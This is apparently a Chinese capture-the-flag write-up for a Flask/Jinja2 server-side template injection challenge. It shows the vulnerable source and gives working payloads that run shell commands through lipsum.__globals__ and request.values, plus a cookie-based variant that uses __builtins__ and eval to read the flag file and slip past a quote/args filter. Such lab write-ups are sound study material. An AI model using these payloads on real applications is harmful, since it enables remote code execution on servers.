Werkzeug/1.0.1Python/3.8.7

    web363 的又被过滤了,换个其他的 EXP (
    为了看源码。。。

    1. /?name={{lipsum.__globals__.os.popen(request.values.tari).read()}}&tari=cat%20/flag

    image.png

    源码

    1. from flask import Flask
    2. from flask import request
    3. from flask import render_template_string
    4. import re
    5. app = Flask(__name__)
    6. @app.route('/')
    7. def app_index():
    8. name = request.args.get('name')
    9. if name:
    10. if re.search(r"\'|\"|args",name,re.I):
    11. return ':('
    12. template = '''
    13. {%% block body %%}
    14. <div class="center-content error">
    15. <h1>Hello</h1>
    16. <h3>%s</h3>
    17. </div>
    18. {%% endblock %%}
    19. ''' % (request.args.get('name'))
    20. return render_template_string(template)
    21. if __name__=="__main__":
    22. app.run(host='0.0.0.0',port=80)

    在 web363 的基础上多过滤了 args
    分别 print 一下 request.valuesrequest.args
    image.png
    发现原来 request.valuesrequest.args 对象的组合

    其他类似解法,如写入 request.cookies

    1. /?name={{x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}

    Cookie 传值

    1. Cookie:x1=__builtins__;x2=__import__('os').popen('cat /flag').read()

    image.png